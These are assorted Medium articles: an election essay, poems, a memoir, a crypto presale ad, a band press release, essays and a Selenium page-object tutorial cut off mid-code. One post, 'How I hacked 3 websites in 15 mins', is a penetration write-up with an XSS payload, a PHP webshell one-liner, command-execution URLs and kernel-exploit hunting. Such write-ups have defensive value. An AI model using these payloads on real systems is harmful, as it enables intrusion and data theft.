Arizona: Trump won in 2016 by 3.6%. His approval rating is underwater by 1% — a swing of 4.6% toward the Democrats.
Georgia: Trump won it by 5% in 2016, but his approval rating now is even.
Iowa: Trump won it by 9.4% in 2016, but now his approval rating is underwater by 9%.
North Carolina: Trump won it in 2016 by 3.7%, but he’s down by 1% now.
Ohio: Trump won it by 8.1%, but he’s down by 1% now.
These numbers came from a report by The Daily Wire, so the true picture could be even worse for Trump. Obviously, approval numbers are not the same as head-to-head polls — if the eventual Democratic candidate has even lower numbers than Trump in these states, Trump could still win. But the trends suggest that Trump is losing voters in these states, in numbers that could end up flipping the 2016 results.
Looking at the electoral map from 2016, the Democrats have several different plausible ways to flip enough states to win, but Trump has only one way to win. He has to hold onto everything he won by more than 2%, plus at least two of the four toss-up states. A couple of the states Trump needed last time might already be out of reach. The Democrats need 43 more electoral votes than they got in 2016. Florida and Michigan would be enough. Florida and Pennsylvania would be enough. Pennsylvania, Michigan and Wisconsin would be enough. Pennsylvania, Wisconsin and North Carolina would be enough. Arizona, Georgia and Michigan would be enough. Ohio, Georgia and Wisconsin would be enough. Texas and Iowa would be enough.
What’s Trump’s best plan for picking off some Democratic states? New Mexico and Minnesota, where his approval ratings are currently negative by ten points and seven points respectively. New Hampshire? Minus 12. Nevada? Minus 15.
Premise 2 — Lightning Strikes Twice?
Go back to 2016. The presidential election featured the top two least popular major candidates ever. The least popular candidate of all won the contest, due to a staggering number of highly unlikely factors that all fell into place before the end.
Trump faced the least popular major candidate ever, other than himself. His opponent in 2020 will most likely be more popular than Clinton. The leading Democratic candidates are all significantly more popular than Trump at the moment.
Two significant third-party candidates ran in 2016. One of them took votes almost exclusively from Hillary Clinton, and one of them took votes from both candidates in roughly equal numbers.
Clinton lost support due to a high-profile FBI investigation that ultimately turned up nothing, but kept voters speculating about possible criminal activity up until the weekend before the election. Clinton was also damaged by a steady stream of leaked emails that were stolen from her campaign chair by foreign intelligence agents, and released to the media by WikiLeaks.
Trump was aided by a long-term influence campaign out of Russia, which spread false information and propaganda aimed at discouraging Democratic voters and motivating conservative turnout.
Conservative turnout generally stayed level with 2012, but Democratic turnout was much lower, because most of the country believed Clinton would win easily. Overall, the turnout was the lowest for any presidential election in 20 years.
Clinton ran an extraordinarily complacent campaign jammed with astonishingly foolish decisions, the worst of which was to stay away from Wisconsin entirely, while Trump visited the state multiple times. Clinton left the campaign trail completely in August for about two weeks, during a time when Trump was doing multiple events every day.
Trump was on course to lose big in 2016 until he hired Steve Bannon. Bannon turned the entire campaign around and delivered the victory.
None of these things is likely to happen again in 2020. The Russians will spread lies, for sure. The misinformation will be more pervasive than last time. But who will fall for it? We already know what they’re doing. If anything, Russian interference will turn off moderate voters who might still be on the fence.
Trump won’t have Steve Bannon in charge of his campaign. This time he has Brad Parscale, who used to make websites for a living.
Whoever the Democratic candidate turns out to be, we won’t have a replay of Clinton’s hapless campaign. The Democrat will campaign hard in every battleground state, and Trump is already behind in most of them.
Will Trump try to steal someone’s emails? Probably, but he probably won’t succeed. Everyone saw what happened the last time, and they know how to prevent it. Trump could order an FBI investigation into his eventual opponent, and he might actually get it. But it would most likely end up costing him votes. People would see it as a brazenly autocratic attempt to re-create the magic of 2016, and another reason to get Trump out of office while we have the chance.
As far as we know, no one is preparing an independent run in 2020, and at this point it’s too late to build a campaign on the level of what Jill Stein or Gary Johnson had in 2016. There won’t be a third-party candidate siphoning votes from the Democrat.
Polls for the past year or so have been indicating high turnouts on both sides for 2020. But turnout was already high among Trump’s base in 2016. He doesn’t have a lot of room for improvement. On the other hand, the Democrats will improve considerably over 2016, as the 2018 midterms proved. And the indications are that Trump has continued to lose support among suburban voters across the country.
Trump’s plan is to turn out his base, in even higher numbers than in 2016. He might do it. But it will be like squeezing the last drops of water out of a damp towel. He already turned out his base once, and he needed every vote he could get. Meanwhile there are millions of Democratic voters who did not vote in 2016, but will be highly motivated to come out this year. They’ve had four years to blame themselves for losing.
As an added bonus for the Democrat, Generation Z is now four years older than in 2016, and some of them are now voting. In 2016 the turnout among younger voters was lower than it should have been, probably because they all wanted Bernie Sanders and he didn’t get the nomination. In 2020 it’s looking to be significantly higher. [Update: After Super Tuesday, the young voter turnout is looking a lot less reliable.] And in the 2018 midterms, Democratic congressional candidates won 67% of the vote from people between 18 and 29 years old.
Premise 3 — Has Trump Gained Support?
Morning Consult has a collection of charts showing the state-by-state trends in President Trump’s net approval ratings, since he was inaugurated up to January 2020. Take a guess at how many states show lower approval ratings for Trump now, compared to three years ago.
All of them. His net approval ratings are lower in all 50 states. Most states show a steep drop-off in the first few months, and then small back-and-forth fluctuations since then. Trump’s approval rating has fallen by double digits in 49 states. Idaho has the smallest net change, at six points. Trump’s ratings have fallen by 20 points or more in 16 states — including Michigan and Florida, which he barely won in 2016 and absolutely needs to hold in 2020.
Again, approval ratings are not the same as head-to-head polls. Some of these people who disapprove might still end up voting for Trump. But these are net changes over time. They indicate a massive loss of support for Trump since he was elected, across every state in the country. The numbers have been steady for three years and are not showing any signs of changing.
Premise 4 — Will the Democrats Really Show Up This Time?
There’s been a lot of recent talk about how Bernie Sanders’ supporters sat out the general election in 2016, and they’ll probably do it again in 2020. We’ll have no way of knowing unless it actually happens. But first Sanders actually has to lose the nomination. [Update: It looks like he will.]
If he wins, will there be moderate Democrats who will sit out, or vote for Trump instead? Maybe Joe Manchin. Everyone else will hold their nose and vote for Bernie, the same way moderate Republicans held their nose and voted for Trump. A lot of Christian conservatives with Biblical values voted for Trump only because they wanted more anti-abortion justices on the Supreme Court. They got their way, and now abortion rights in America are seriously endangered. When moderate Democrats look at a choice between Bernie Sanders and potentially a 7–2 conservative majority on the Supreme Court, they’ll vote for Bernie.
What if Bernie loses? Some of his supporters may sit out. It won’t be as many as last time, because they won’t be able to make the same argument about the primaries being rigged against him. The Democratic establishment is [Update: was] helping Bernie sail toward the nomination, by splitting the moderate vote among three candidates. If he loses, it’ll be because he lost it fair and square.
In 2016, Bernie voters sat out because they were more angry at Clinton than they were at Trump. In 2020, they’ll be more angry at Trump than anyone else.
In general, analysts are predicting a historically large turnout in 2020. Turnout was huge in 2018, even when Trump wasn’t on the ballot. Turnout was the highest in history for the New Hampshire primary last week. And Nevada reported huge numbers in early voting, potentially big enough to break the overall turnout record from 2008.
Conclusions: Trump Has No Path to Victory
Trump’s big problem is that he’s the one driving Democratic turnout. Democrats have been showing up to vote in ever-greater numbers for the past three years, specifically because they can’t stand having Trump as their President. They’re not united behind anyone on their own side. No Democratic candidate even has steady support from a quarter of the Democratic voters, while Trump has support from more than 90% of the Republicans. The polls will be overrun by Democrats in 2020, solely because they want to vote Trump out.
So he’s caught in a dilemma. He can take himself off the ticket, and let someone else be President. Or he can run for re-election, and get beaten by superior numbers. Those are his two choices.
In my original argument, premises 2, 3, and 4 lead directly to the first conclusion in line 5. And that conclusion along with premise 1 gives us the second conclusion: Trump will lose in 2020. | https://medium.com/the-national-discussion/if-you-really-think-trump-is-favored-in-2020-you-havent-thought-it-through-50516e2fc23f | ['Adam Powell'] | 2020-08-25 20:43:33.802000+00:00 | ['Bernie Sanders', 'Politics', 'Trump', 'Elections', 'Democracy'] |
In less than 24 hours the VectorZilla Token Pre-Sale Ends! Secure your VZ tokens now! | The VectorZilla token pre-sale is inching close to a successful end. You can still join our community of amazing contributors and angel investors, and receive generous bonuses.
Only two simple steps stand between you and your tokens:
Step One: To buy VZT & become eligible to participate, just click on the link given below to sign up:
https://account.vectorzilla.io/#/signup
Sign up and complete your KYC details.
Step Two: Once you complete the signup details and verify your email ID, the system will validate the KYC in real time. It is quick and simple, and should not take more than 1 minute.
You will be given full access to your VectorZilla Personal Account. You can click on the invest button to view the contract address and other payment options. Determine your desired amount and then make your contribution!
The World of Sensations | I’ve been reborn into
The World of Sensations
Baby pink sweater
Child laughing
Brown soda pop dancing on the tongue
I find it hard to believe
How much there is to feel
~to attune to~
Have you noticed the camera angles on The Office?
One can say a lot just by zooming in
I think I’m finally able to zoom in on life
The mundane is extraordinary
The shower, makeup, hair extravaganza is pleasurable
The way I check my body in the mirror each day
for impurities and fat is saddening
But I had hardly noticed that on
AUTOPILOT
Where do we go when we exit the present moment?
They took my autonomy too many times, so
disappearing into random brain synapses and
the whims of old memories scares me the most
More than drowning
Okay, maybe not more than drowning
but it’s comparable
I’ve been reborn into
The World of Sensations
My amygdala is losing its power
so I threw out the oatmeal
that spilled in the pockets of my winter coat
For the record, it wasn’t quirky when I forgot
everything
It was really sad for me
But I’m glad we could all laugh about it at the time
I’ve always wanted to be an entertainer | https://medium.com/assemblage/the-world-of-sensations-d2c593fe2bcb | ['Blithe Anderson'] | 2020-12-04 12:51:14.803000+00:00 | ['PTSD', 'Emotions', 'Trauma Recovery', 'Poetry', 'Poetry On Medium'] |
Neutralizing the Truth! | ### The Pentagon’s Unmanned Spokesdrone
Personally, though, I always thought it was more effective when the unmanned drone was made to look like an [attractive woman](http://images.google.com/images?q=dana+perino&um=1&ie=UTF-8&sa=X&oi=image_result_group&resnum=1&ct=title). Or am I just thinking of Battlestar Galactica? | https://medium.com/minds-on-media/neutralizing-the-truth-b87fdfb4aabb | ['R. E. Warner'] | 2018-01-29 07:02:28.242000+00:00 | ['Drone', 'Those Crazy Droids', 'Dana Perino', 'Battlestar Galactica', 'Bst'] |
I’ll Cherish the Memories of the House That Built Me — Her View From Home | I always assumed my parents would have our childhood home forever. It would always be a place for me to come back to-a place of comfort and memories. But, the Zillow listing slapped me in the face. A wake-up call that I can’t hold on to things forever. Words jump out at me-Cape Cod. 4 bedrooms and 3 full baths. Square feet. Finished basement. Move-in ready. Granite countertops. These were the words used to describe the house I grew up in? Nouns. So concrete and factual and so matter of fact that I wondered if the house staring back at me was even our house. I had to change that. I had to rewrite it.
I just had to come back one last time. Ma’am, I know you don’t know me from Adam.
But that front door you have closed was always opened. Kids from the neighborhood would run in and out all day. My mom would try to scrub up the footprints, only to have another little kid trod his muddy shoes into the house. She didn’t care. She loved it and would always have a snack for everyone.
Up those stairs, that bedroom off to the left was mine. It’s where I spent hours writing and filling pages of journals and playing school with my dolls.
And I bet you didn’t know out in the front lawn, there is a patch of grass that doesn’t grow. That was the home plate for our Wiffle ball games. My dad would be the only adult playing with all the neighborhood kids. He would taunt them until the losing team would skulk off and cry. And I, the only girl, would rattle off my softball chants in a squeal that was sure to annoy rowdy boys.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
Mom got ideas from HGTV for years. From HomeGoods and Pier 1 stores. Plans were made and granite was laid. And nail by nail and board by board, my mom’s dreams came alive. We had granite countertops put in, our basement finished, and our deck expanded. But I know she doesn’t remember our house for that. My friends would gather around those granite countertops, digging into snacks and laughing, after football games, for sleepovers, friendship days, Oscar parties, and our annual beer, wine, and cheese party, which would turn into a packed house and ended with someone daring a brave soul to drink the spit bucket mixed with all the beer and wine.
And down in that basement is where my brother and his friends (the bad guys) would chase my friends and me through the tunnels and the secret door. It’s where we would perform plays and have birthday parties that would turn into a game of hot potato getting out of hand between my cousins or the neighbor getting attacked by another little kid. All caught on camera, thankful that my dad behind the camera kept filming instead of stopping to intervene. And out on that side deck, an epic shot was made into the neighbor’s basketball hoop.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
Right there in that living room is where we would decorate the Christmas tree.
My grandparents would come over for a ham sandwich lunch and to see all the presents we got. And in that little corner is where we replaced the big Christmas tree with a Charlie Brown tree the year my mom got cancer. And on those floors, we all laid together and watched a movie, thankful her surgery went well. Down the hallway, that bedroom was an office where the company my dad started grew from. My aunt would come every day to work, and she would bring my cousin to play with us. When that phone rang, we had to be quiet.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
Outside, every summer, our yard would transform into the carnival. Right over there, by the woods was a treehouse that became the water balloon stand and next to the deck was the baseball toss. And I, by the road, would man the prize stand. After it was over, my mom would gather all of us up and march us down to Catholic Charities to hand over the money and work.
When my uncle, aunt, cousins, and grandma would visit, we had lemonade stands. Twenty-five cents for a lemonade and a pack of gum. People would come from all over to line up. As we got older, a badminton net became a permanent fixture in the yard during the summer. Friends would come over for tournaments.
If I could just come in I swear I’ll leave. Won’t take nothing but a memory. From the house that built me.
That house right next door, the Taylors live there. Their three boys now grown and moved away. In their backyard was a swimming pool. We had many volleyball games and races there.
On a summer night, we would play pickup games on their basketball court and then in the fall have a bonfire and a movie in their yard.
If you get a chance, ask them about how we killed their pet while they were away on vacation and how my dad made a neighborhood kid cry from scaring him during a campout. And when the sky got dark and the streetlight turned on, neighbors would come out to gather in our yard. The adults would talk and drink while the kids played hide-and-seek. Under the Taylor’s deck was a good place to hide.
You leave home, you move on and you do the best you can.
Whenever I got lost in this old world and forgot who I was, I would come back to this house. At first, I came back alone. Then, I brought my husband. And finally, I brought my son. Now, I will have nothing to go back to but these wonderful memories thanks to the house that built me. | https://medium.com/@laurenbarrettwrites/ill-cherish-the-memories-of-the-house-that-built-me-her-view-from-home-d88ebf13bd26 | [] | 2021-02-01 14:44:47.957000+00:00 | ['Mommy Bloggers', 'Growing Up', 'Childhood Memories', 'Nostalgia', 'Childhood'] |
The Difference Between Your Value and Knowing You’re Valuable | I’ve been in the GIS, Geospatial, and GEOINT community for 20 years now and it makes me feel old saying it. I will take the feeling old because it also means that I’ve learned and experienced a lot in those 20 years, and I look forward to the lessons and experiences of the next 20 years.
My geospatial journey started with the Marine Corps and that is without question the single greatest decision of my life other than the decision to become a father. My time the Corps was followed by experiences and opportunities with Anteon, BAE Systems, NW Systems, Esri, and most recently Boundless. Each of these professional waypoints has provided me a lifetime of lessons learned (good and bad) and shaped how and who I am as a professional, but none has had the impact (excluding the Marine Corps) that Spatial Networks has. I am forever grateful for those other opportunities, but in Spatial Networks I found something special.
I found a culture and a professional family. A family that genuinely cares about one another and cares about doing what’s best for the customer and the greater good before that of the individual. This corporate culture is a scaled-up-and-out version of our founder’s (Tony Quartararo) personal code of conduct, a code he refers to as “Professional Integrity.” He demands it of himself, demands it of his employees, and demands that we demand it in our own relationships. My move to Spatial Networks was valuable for many reasons, but most importantly because it has re-energized me and resulted in deeper, more mission-focused thinking than ever before and a new tagline:
Know the difference between your value and being valuable.
Every single person within an organization is both, but they all bring something different to the table. Everyone has value within their organization, and is also valuable to someone both inside and outside their organization — and that goes for the geospatial community as much as (in some cases, maybe more than) anywhere else.
Most people can tell you what their value is to their employer. Fewer people truly understand why they’re valuable.
I’ll explain the difference:
In the Marines, I provided value as a geospatial analyst. It was my job to be prepared, be precise, and explain the battlefield. I’d build a virtual world for the guys headed out there so when they arrived, it was like they’d already been there: There’s a five-story building. There’s a broken-out window on the east side of the third floor. There’s a back door where you can get out.
That was the value I brought to that role.
But when those guys completed the mission and were one step closer to going home to their families? That’s why I was valuable.
Here’s another example: Account executives provide value to their companies by establishing and maintaining relationships with their customers and bringing in revenue.
But account executives are valuable to their customers because they act as advisors and advocates. With their knowledge of the company and product, account executives are able to make recommendations to help their customers be successful and solve problems. (If their customers are not successful, they won’t be customers for long.)
So, you see the difference. But not everyone does.
Here at Spatial Networks, I don’t think our software developers truly understand how valuable they are.
They know their value: They build best-in-class software solutions to help our customers solve their problems. They come in, they write their code, and they go home. (A little oversimplification, maybe, but you get it.)
What they don’t know is exactly how their work impacts the end user.
They don’t see the decisions our customers make with the information they are able to derive from our software. They don’t see that their work — in many cases — literally saves lives.
It’s a big deal! (It’s also why I was so excited to join the team last year.)
So you can see why it’s important, as an employee, to understand more than just your value to a company. When you understand why you’re valuable, you find purpose and passion in your job and in your life. Then you not only find more joy in your work, but you have more power over your whole career.
And as a boss, you want your employees to know why they’re valuable because people who are passionate about their jobs work harder — gladly.
When everyone in an organization knows not just their value, but why they are valuable, everyone wins together! | https://blog.spatialnetworks.com/the-difference-between-your-value-and-knowing-youre-valuable-db4354448b30 | ['Brian Monheiser'] | 2019-04-03 15:01:26.582000+00:00 | ['Integrity', 'Corporate Culture', 'Military', 'Geospatial Industry', 'Geospatial'] |
How I hacked 3 websites in 15 mins | Are you under the impression that XSS vulnerabilities don’t really affect websites?
I started learning about website vulnerabilities a few months back. Until a few days ago, it was all just finding issues, sharing them, and making fixes. This time I thought, why not show how this works?
One of my acquaintances asked if I could check their website. Is there any way we can get to the server? Settling this question is an important stage before you get into any website.
Caution: Get permission before testing a website or accessing its server. Never test anything without permission, and don’t use this for any illegal activity. Don’t be a cracker.
The answer was positive and I went ahead.
Let the game began…
Whenever you go after a website, the first step is to learn about the target without doing much at all.
The first move
Scanning ports using nmap
nmap --top-ports 1000 -T4 -sC mysite.com
The scan was completed in about 3 mins.
The only ports open for interaction without credentials were 80/443. That wasn’t much to go on, so I went ahead with dummy login credentials. The first thing that comes to mind when you see input fields is script injection. I knew they had this vulnerability before, so I went ahead just to check whether it still existed. I tested it using
<img src=x onerror='alert("123");'>
and it worked.
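Server-side escaping is the standard fix for this class of payload. Here is a minimal sketch in Python (the target site runs PHP; Python is used here purely to illustrate the idea), showing how escaping turns the payload into inert text:

```python
import html

def render_comment(user_input: str) -> str:
    # Escape &, <, >, and quotes so the browser shows the payload
    # as plain text instead of parsing it as an <img> tag.
    return "<p>" + html.escape(user_input, quote=True) + "</p>"

payload = "<img src=x onerror='alert(\"123\");'>"
print(render_comment(payload))
```

The onerror handler never fires because no element is ever created; in PHP the same idea is what htmlspecialchars() is for.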
In 5 mins we had found a vulnerability — the XSS hole still existed. But this wasn’t all. Going through a form, I saw a file upload section. Why not check for an Unrestricted File Upload vulnerability? How kind!
Opened my terminal and executed
echo "<?php system(\$_GET['cmd']); ?>" > exploit.php
I tried to upload this file through that attachment field. It got uploaded where I had expected to be stopped. In 8 mins, I had the second vulnerability. Now it was digging time.
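A simple allow-list on the server would have stopped that upload cold. A hedged sketch follows; the extension list is an assumption for illustration, not what the site actually accepts:

```python
import os

# Hypothetical allow-list; the real form presumably expects documents or images.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}

def is_upload_allowed(filename: str) -> bool:
    # Lower-case the name and keep only the final extension,
    # then reject anything not explicitly allowed.
    ext = os.path.splitext(filename.lower())[1]
    return ext in ALLOWED_EXTENSIONS

print(is_upload_allowed("report.pdf"))    # True
print(is_upload_allowed("exploit.php"))   # False
```

Extension checks alone can still be bypassed on misconfigured servers, so pairing this with content-type checks and storing uploads outside the web root is the safer design.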
Since it got uploaded, it had to be sitting somewhere on the server. I right-clicked the name of the file I had uploaded, chose copy link address, and pasted it in a new tab.
GOD Mode activated
It resulted in https://mysite.com/path/XXXXX.php
Just like that, our sweet shell from the browser to the server was ready.
I tried this URL: https://mysite.com/path/XXXXX.php?cmd=whoami and it loaded ‘www-data’.
~9 mins in, and we had low-privileged access to the server.
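Driving such a webshell by hand gets tedious, so a tester usually wraps it in a tiny helper. This sketch only builds the GET URLs used above; the path is the same redacted placeholder from the post, not a real endpoint:

```python
from urllib.parse import urlencode

# Placeholder path, exactly as redacted in the post.
SHELL = "https://mysite.com/path/XXXXX.php"

def shell_url(cmd: str) -> str:
    # urlencode handles spaces and slashes so the whole command
    # survives the trip into PHP's $_GET['cmd'].
    return SHELL + "?" + urlencode({"cmd": cmd})

print(shell_url("whoami"))  # https://mysite.com/path/XXXXX.php?cmd=whoami
print(shell_url("ls /var/www/html"))
```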
The next shock came when I checked this: https://mysite.com/path/XXXXX.php?cmd=ls /var/www/html
There wasn’t just one website: three or more were hosted on the same server, and read access to all of them was available. Without any delay, I shared this with my mentor, and with his help, I went ahead. We tried to get files off the server by moving them into a browser-accessible location, and we succeeded. We were able to read many SQL files and backup files there (a developer knows how important these are) and to create new files. That means we had read-write access. We also tried to access the database, though that attempt didn’t succeed.
In 12 mins we had lots of information. This was serious! Now,
The climax
I decided to check if I could somehow get root access. I checked
cat /etc/issue
and from there I got the OS details. Then, I ran
uname -a
and got the kernel version. Once you have these, you can find exploit scripts online for known kernel vulnerabilities. I found one that could make me root if I could access the /tmp location, which I was able to do.
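Matching a kernel release string against known-vulnerable ranges is mostly version arithmetic. A hedged sketch, where the cutoff value is purely illustrative and not a real advisory boundary:

```python
def kernel_tuple(release: str) -> tuple:
    # "4.4.0-21-generic" -> (4, 4, 0): drop the distro suffix,
    # split the dotted part into comparable integers.
    return tuple(int(p) for p in release.split("-")[0].split("."))

def older_than(release: str, cutoff: tuple) -> bool:
    # Tuples compare element-wise, so this is a clean version check.
    return kernel_tuple(release) < cutoff

print(older_than("4.4.0-21-generic", (4, 8, 0)))  # True: worth hunting for a local exploit
```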
It’s time to stop!
What an attacker could have done:
1. Modify the server
2. Add some malware
3. Make the information publicly available
4. Do some fun attacks
5. Use the server
6. Not jokingly, rm -rf (and here, game over)
7. The rest I leave to you
Time up! 15 mins done.
What did we get?
1. An XSS vulnerability, which confirmed that injected HTML was being rendered
2. An unrestricted file upload leading to server access
3. The ability to become root
The next day I shared it with them and they fixed it.
So, never underestimate XSS, and never skip upload restrictions. A single miss can be deadly.
Bookended |
Gary Dranow and The Manic Emotions exemplify the tasteful authenticity of classical rock and Blues… | Gary Dranow and The Manic Emotions exemplify the tasteful authenticity of classical rock and Blues music in their new album ‘Never Give Up.’
Park City, Utah — June 11th, 2021 — Gary Dranow and The Manic Emotions is a three-piece band ready to take the listeners on an exhilarating journey through music. Having mastered the art of classic rock and authentic blues in an era of heavily auto-tuned pop music, the band stands out for its striking originality.
Telling tales of love, heartbreak, relationships, loss, and the accompanying mental struggles of such emotions, Gary Dranow and The Manic Emotions create compositions that transcend the boundaries of known genres. This is made possible through the band’s connection to its roots which brings richness to its lyrics and distinct touch to its performances.
Gary Dranow and The Manic Emotions is releasing its first album, ‘Destiny Road’, following the release of its prelude, “Destiny Road — Rough Cuts”. Although the album itself has been ten years in the making, the band believes the time is just right for the world to experience its work, which it had originally intended to release in the summer of 1995 using Jefferson Airplane’s old 2” 16-track machine. Even though the original plan never came to fruition as the band fought personal battles, the tracks making up ‘Destiny Road’ remain the same as they were when first conceived ten years ago. However, in order to stay true to the times and changes, the band decided to release the prelude to memorialize things as they were.
With its second album, titled ‘Never Give Up’, scheduled for release in the winter of 2021, Gary Dranow and The Manic Emotions is currently booking gigs and performing throughout the Greater Salt Lake City area, including Park City, Utah.
Check out and learn more about Gary Dranow and The Manic Emotions through their website and other links given below.
###
About:
Gary Dranow and the Manic Emotions is a three-piece band with Gary Dranow on the vocals and guitar, Bob Nellis on the drums, and Jeff Lawrence on the bass and vocals. Having worked on an album for over ten years, the band is ready to take the world by storm with renewed zeal and enthusiasm. The band members are full of vigor and excitement, and their second album is scheduled to be released soon in the winter of 2021.
Contact:
Name: Gary Dranow
Email: gary@modernskiracing.com
Phone: (801)680–6066, (435)200–9037
Links:
Twitter https://twitter.com/garydranow
YouTube https://www.youtube.com/watch?v=gUODf-9t6S4
SoundCloud https://soundcloud.com/gary-dranow
LinkedIn https://www.linkedin.com/in/gary-dranow-24795716/
Spotify https://open.spotify.com/artist/0ln6vyEEr8rYl7ZB5aJv0T
Source: ArtistPR Music Press Release
#Blues, #Rock, #SingerSongwriter, #PressRelease | https://medium.com/music-press-release/gary-dranow-and-the-manic-emotions-exemplify-the-tasteful-authenticity-of-classical-rock-and-blues-4ee06b0ba858 | [] | 2021-07-17 19:11:38.040000+00:00 | ['Blues', 'Singer Songwriter', 'Rock'] |
Police Monoculture | Many, if not most, police departments across the country have a policy of recruiting and hiring at most only slightly-above-average intelligence. Police departments, though ostensibly separate, local, and distinct, often use the same tests and the same criteria for recruits and for training. These policies are local, but deployed nationwide. They exist on the theory that exceptionally intelligent police officers will too easily become bored with the job and leave after only a few years of costly training. From walking a beat to stakeouts or simply directing traffic, the theory goes, very smart people will get tired and bored too easily.
Besides very little scientific basis for this theory, there are several fatal misprisions here. First, that highly intelligent people are helpless before boredom and have little sense of duty and diligence; This is to say that boredom is a force more powerful than diligence or discipline. Secondly, it fails to address the idea that seasoned officers of average or slightly above average intelligence teaching raw recruits of the same intellectual gifts might not be the main driver of cost in training. If you don’t have anyone of exceptional intelligence to promote, from time to time, you’ll just get more reinforcement.
The problem, of course, has nothing to do with any particular recruit or officer of average or above-average intelligence. Any sizeable group will have a large number of their personnel — perhaps even a majority — of average intelligence.
The problem is the wholesale exclusion — indeed denial — of anybody well above average or of exceptional intelligence.
When high intelligence is denied, all you will get is what an average intelligence thinks is acceptable, and a continually reinforcing cycle of that average intelligence.
Monoculture
What you get is a monoculture: a complete lack of diversity where behaviours and mores that ought to be challenged, are instead adopted and propagated. That’s why Eric Garner can be asphyxiated in 2014 and George Floyd asphyxiated in 2020… Where’s the impetus to change? To get better? To do better? To even understand what better means?
Given the complexities of modern policing, a distinct and well-entrenched monoculture has a levelling effect: reducing the complexities to simplistic solutions of brute force and violence; reducing the willingness to change.
And, not for nothing, how is it that we can have a thriving genre of television, from Columbo to The Wire, that portrays smart detectives chasing down the bad guys when the police in the real world aren’t that smart? I’m not saying they’re dumb. But I can’t say they are smart. (And, also not for nothing…if there’s nothing limiting the intelligence of the criminals… Why should we limit the intelligence of the police?) | https://medium.com/an-injustice/police-monoculture-e7819d8d8242 | ['Petr Swedock'] | 2020-10-21 21:17:49.786000+00:00 | ['Police', 'Workplace Culture', 'Law Enforcement', 'Community'] |
4. Page Object Model Pattern | Hello folks! We have prepared our environment so that building a test automation framework. At this stage, I am going to start discussing Page Object Model Pattern in Selenium. I highly recommend you to read the previous posts beforehand.
You can find what you should expect from this post below;
What is the Page Object Model (POM)?
Why should we use POM?
Implementation.
Advantages of using POM.
1. What is Page Object Model(POM)?
Page Object Model is a design pattern, used mostly in Web UI testing, that enhances the maintainability of the test code and reduces duplication. Each page in the web application is represented by a separate class, distinct from the others. These classes contain the Web Elements (locators) of the web page and the methods which perform operations on those Web Elements, and they exist so that the corresponding page tests can be executed against them.
2. Why should we use POM?
As I mentioned above, Selenium test projects are generally hard to maintain. Also, there is a significant amount of duplicated code. Duplicated code causes unnecessary functionality and many confusingly similar page object locators. Another reason is that page locators change frequently. If a locator changes, you have to adjust it for the new implementation. This is a considerable waste of time for the QA team. You cannot see the real advantage of POM if you only have a small script testing the login behavior of the application; script maintenance looks easy. However, as time goes on, the test suite will grow. As you add more and more lines to your code, things become tough. Think about this: if you spend all your time maintaining your code at every change, how will you ever increase your test coverage?
3. Implementation
Okay, we have talked about theory enough. It’s time to write some code. I will be using the PyCharm IDE to develop the Page Object Model-based project. Create a directory on your local machine and name it whatever you want. Here is the very first window once you start creating a new project in PyCharm. First, specify both the location and the project name. Then select a project interpreter and click the Create button.
Creating a new POM project in PyCharm
The next step is creating separate folders for the corresponding elements. For example, Web Elements will be located under the Locators folder, common actions in the Base class, the Chrome, Firefox, or Explorer driver in Drivers, Web Page methods in Pages, and test cases in the Tests folder. You can also create a TestSuite folder so that you can execute your tests as a suite. Here is the project folder structure below.
The folder structure in a POM pattern
We can create Python files under these folders for the actions related to our Application Under Test. To create a Python file, right-click the Locators folder, click “New”, and create a Python file.
After creating the associated files, your project structure will look like this.
Python project structure
I will only talk about the Login Page, to give a clear idea of what we are doing with the Page Object Model pattern. Assume you will test the login functionality of a web application: you need to enter a username and password on the Login Page and click the login button to enter the system.
We need to send the username and password details into the related text boxes using the send_keys() function, then click the login button to enter the Home Page, and then verify whether we are on the correct page. We should create 3 Python classes to achieve a POM-based test: locators.py for web elements, LoginPage.py for page methods, and test_login.py for the test. We also need to create a Base class that holds the WebDriver object.
base.py
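The original post shows base.py only as a screenshot. As a hedged sketch (the class and method names here are illustrative, not the article's exact code), a base page class typically wraps the WebDriver actions that every page object shares:

```python
class BasePage:
    """Wraps common WebDriver actions shared by all page objects."""

    def __init__(self, driver):
        # driver is a Selenium WebDriver (or any compatible) instance
        self.driver = driver

    def find(self, locator):
        # locator is a (by, value) tuple, e.g. ("id", "username")
        return self.driver.find_element(*locator)

    def click(self, locator):
        self.find(locator).click()

    def type_text(self, locator, text):
        # clear the field first, then type the given text
        element = self.find(locator)
        element.clear()
        element.send_keys(text)

    def title(self):
        # the current page title, handy for verification steps
        return self.driver.title
```

Every page class can then inherit from BasePage, so explicit waits, logging, or retries can later be added in one place.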
locators.py
Some codes in locators.py
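locators.py was likewise shown only as an image. A minimal sketch of what such a file usually contains follows; in a real project the first tuple element would come from selenium.webdriver.common.by.By (where By.ID is literally the string "id"), and the element ids below are assumptions, not the article's actual locators:

```python
class LoginPageLocators:
    """Locators for the Login page, kept in one place so a UI change
    only requires an edit here. Element ids are illustrative."""
    USERNAME_FIELD = ("id", "username")   # By.ID in real Selenium code
    PASSWORD_FIELD = ("id", "password")
    LOGIN_BUTTON = ("xpath", "//button[@type='submit']")
```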
LoginPage.py
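LoginPage.py also appeared only as a screenshot. Below is a self-contained sketch of a login page object; the locator values are hypothetical, and the driver can be any object exposing Selenium's find_element interface:

```python
class LoginPage:
    """Page object for the Login page: it holds the page's locators and
    the actions a test can perform on it. Locator values are illustrative."""
    USERNAME_FIELD = ("id", "username")
    PASSWORD_FIELD = ("id", "password")
    LOGIN_BUTTON = ("id", "login")

    def __init__(self, driver):
        self.driver = driver

    def login(self, username, password):
        # fill both fields, then submit
        self.driver.find_element(*self.USERNAME_FIELD).send_keys(username)
        self.driver.find_element(*self.PASSWORD_FIELD).send_keys(password)
        self.driver.find_element(*self.LOGIN_BUTTON).click()
```

A test never touches locators directly; it only calls login(), which is what makes the test resilient to UI changes.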
test_login.py
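test_login.py was also shown as an image. The sketch below follows the common unittest layout for such a test; to keep it runnable anywhere it substitutes a stub driver for webdriver.Chrome() and repeats a minimal LoginPage inline, so all names and the "Home Page" title are illustrative. In a real run, setUp would create the Chrome driver and the assertion would check the actual post-login page title:

```python
import unittest


class _StubDriver:
    """Stands in for webdriver.Chrome() so the sketch runs without a browser."""
    def __init__(self):
        self.events = []
        self.title = "Home Page"  # pretend the login landed on the Home Page

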